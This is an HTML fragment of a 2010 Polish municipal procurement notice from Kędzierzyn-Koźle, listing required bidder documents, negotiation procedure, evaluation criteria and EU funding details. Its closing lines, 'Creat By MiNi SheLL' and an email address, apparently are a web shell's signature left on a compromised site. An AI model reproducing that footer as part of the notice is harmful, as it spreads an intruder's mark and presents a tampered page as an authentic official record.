<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do  reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego
Dokument potwierdzający prawo do składania oświadczenia woli w imieniu Wykonawcy (Dotyczy osób fizycznych i spółek cywilnych)
Oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Wiedza i doświadczenie - 45 pkt. plus za każdą kolejną usługę powyżej 3-ech w podanym okresie 5 pkt.
Osoby zdolne do wykonania zamówienia - 45 pkt. plus za każdego dodatkowego specjalistę 5 pkt.
Sytuacja ekonomiczna i finansowa - 10 pkt. plus za każde dodatkowe 50 tys. posiadanych środków 5 pkt.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja zostanie przesłana do wykonawców, krórzy zostaną zaproszeni do złożenia ofert wstępnych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2010 godzina 14:00, miejsce: 47-200 KĘDZIERZYN-KOŹLE, ul. Planetorza 2, pok. 1
Wydział Zamówień Publicznych Urzędu Miasta Kędzierzyn-Koźle.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie finansowane w ramach Projektu Sprawny Samorząd. Wdrażanie usprawnień w zarządzaniu jednostką samorządu terytorialnego w 10 urzędach gmin i 2 starostwach powiatowych z terenu województwa opolskiego i śląskiego, współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki ,Priorytetu V Dobre rządzenie Działania 5.2. Wzmocnienie potencjału administracji samorządowej Poddziałania 5.2.1. Modernizacja zarządzania w administracji samorządowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com